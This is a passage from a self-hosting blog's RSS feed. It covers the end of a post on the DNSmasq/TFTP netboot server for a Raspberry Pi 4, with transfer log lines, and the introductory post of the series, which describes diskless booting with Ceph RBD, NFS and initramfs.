</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span></code></pre></div><p>Important for us is the <code>2408886387 sent size:  4 option: 54 server-identifier  10.86.5.152</code>
message. It informs the client requesting netboot about where it can find the
TFTP server. In this case, this is just the IP of my local boot server.</p>
<p>Right after the DHCP message is sent, the file transfers for the boot files start:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/start4.elf to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/config.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/initrd.img to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/bcm2711-rpi-4-b.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/overlay_map.dtb to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/dwc2.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-bt.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/overlays/disable-wifi.dtbo to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/cmdline.txt to 10.86.5.151
</span></span><span style="display:flex;"><span>sent /mnt/netboot/bf9fed6f/vmlinuz to 10.86.5.151
</span></span></code></pre></div><p>I&rsquo;m honestly still not sure where the <code>Early terminate</code> errors are coming from.
The file seems to be retried and succeed later, but I don&rsquo;t see any dropped
packets or similar.</p>
<p>This concludes the second part of the Pi netboot series. An overview of all
parts can be found in <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Part I of the series</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi 4 Part I: Introduction</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/intro/</link>
      <pubDate>Mon, 25 Jul 2022 23:04:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/intro/</guid>
      <description>Overview of netbooting a Raspberry Pi 4</description>
      <content:encoded><![CDATA[<p>In this multipart series, I will be detailing how I set up a Raspberry Pi 4 to
netboot, with no local SD card/eMMC/other storage required.
The setup will use <a href="https://ceph.io">Ceph</a> to provide both, NFS storage for
the <code>/boot</code> partition, and an <a href="https://docs.ceph.com/en/latest/rbd/">RBD volume</a>
for the root disk. For the PXE netboot itself, <a href="https://thekelleys.org.uk/dnsmasq/doc.html">DNSmasq</a> will be used.</p>
<ul>
<li>Part II: <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/">The Netboot Server</a></li>
<li>Part III: <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Telling Linux Where to Boot From</a></li>
<li>Part IV: <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Using Packer and Ansible to create a Raspberry Pi Ubuntu Netboot Image</a></li>
<li>Part V: <a href="https://blog.mei-home.net/posts/rpi-netboot/playbook/">Ansible Playbook</a></li>
<li>Part VI: <a href="https://blog.mei-home.net/posts/rpi-netboot/conclusion/">Conclusion</a></li>
</ul>
<h1 id="why-though">Why though?</h1>
<p>So why would you want a diskless Pi? First of all, the standard option for
Raspberry Pi storage is either an SD card or, for Pi CM4 modules, eMMC storage.
Both have the same downsides: their performance is relatively poor, and they are
not very durable, wearing out quickly under any but the lightest
write loads.</p>
<p>The next option is a disk attached via USB. Here I must admit that my main
aversion comes from previous problems related to choosing the right USB to SATA
adapter. Not all of them work well with Linux, or their <a href="https://en.wikipedia.org/wiki/USB_Attached_SCSI">UASP</a> support might not work under Linux, slowing down
your IO. In <a href="https://www.jeffgeerling.com/blog/2020/uasp-makes-raspberry-pi-4-disk-io-50-faster">this article</a>, Jeff Geerling measured a 50% increase in performance
from using UASP.</p>
<p>Finally: I&rsquo;m planning to set up a Pi Cluster with CM4 modules using the
<a href="https://turingpi.com/turing-pi-v2-is-here/">Turing Pi 2</a>. Buying a disk for
each of my Pis just seems like way too much cabling, way too much effort and
honestly way too much e-waste, compared to just buying a larger SSD and using
it off a Ceph cluster.</p>
<h1 id="assumptions">Assumptions</h1>
<p>This series will make one really big assumption that&rsquo;s probably not true for
most of you: That you have got access to a Ceph storage cluster.</p>
<p>I have personally become a big fan of Ceph ever since I first set it up
last year. It can provide the same disk space in three different formats:</p>
<ol>
<li>As Linux block devices which can be used and partitioned as any normal disk
would</li>
<li>As CephFS volumes, which is a POSIX compatible file system for direct
mounting with concurrent read/write on multiple hosts</li>
<li>As an S3-compatible service</li>
</ol>
<p>I really enjoy using it, and I would recommend it to any adventurous self hoster
looking for some fun with storage.</p>
<p>But I also realize that it&rsquo;s rather niche in the self hosting space. In the
article describing the root disk setup, I will try to also provide some hints
on using something other than Ceph RBD volumes for the Pi&rsquo;s root disk.</p>
<h1 id="setup">Setup</h1>
<p>The setup will be using multiple components.</p>
<p>The boot process will be looking like this:</p>
<ol>
<li>Get the TFTP server address from DNSmasq</li>
<li>Load the kernel, initramfs and config files from DNSmasq&rsquo;s TFTP server</li>
<li>Boot into the downloaded kernel and mount the initramfs</li>
<li>Mount the Ceph RBD root volume</li>
<li>Continue the boot process and mount the NFS based <code>/boot</code> directory</li>
</ol>
<p>First, the creation of an image with HashiCorp&rsquo;s <a href="https://www.packer.io/">Packer</a>
will be discussed. This is mostly a personal preference - I like to have
as much of the setup as possible in code, so that my bad documentation habits bite me as
little as possible. The image creation will use the <a href="https://github.com/mkaczanowski/packer-builder-arm">packer-builder-arm</a> Packer builder to provision an Ubuntu server image and Ansible to do some basic configuration.
Any non-Ubuntu Linux distribution and any non-Packer way of creating an image
will be fine, I will try to keep it generic.</p>
<p>In the most interesting step, I will be discussing Linux initramfs and what
role it plays when doing a non-traditional boot. This was the most educational
part of the whole setup: up until then, the Linux initramfs had always been
just this <em>magic</em> part of Linux which somehow did voodoo early boot things.
It turns out: No magic involved, just a compressed minimal root FS and some shell
scripting. &#x1f937;</p>
<p>In the next step, DNSmasq will be providing the actual netbooting capability,
providing two important components: A proxy DHCP server which will only provide
the netboot relevant options and the <a href="https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol">TFTP</a> server delivering the necessary boot files. In the case
of the Raspberry Pi 4, these are the dtb files, the kernel and the initramfs
as well as the boot configuration file.
This part will also contain a brief overview of how to configure the Pi itself
for netbooting and how it behaves during netboots.</p>
<p>Finally, both the netboot server running DNSmasq and the individual Pis will
mount an NFS share with the <code>/boot</code> directory. On the netboot server, DNSmasq
will take the individual kernels and boot configs as well as initramfs from the
share.
The Pis, on the other hand, will mount subdirectories of the share as their
<code>/boot</code> dir. This ensures that during OS updates, the files used by the netboot
server are automatically updated.</p>
]]></content:encoded>
    </item>
  </channel>
</rss>
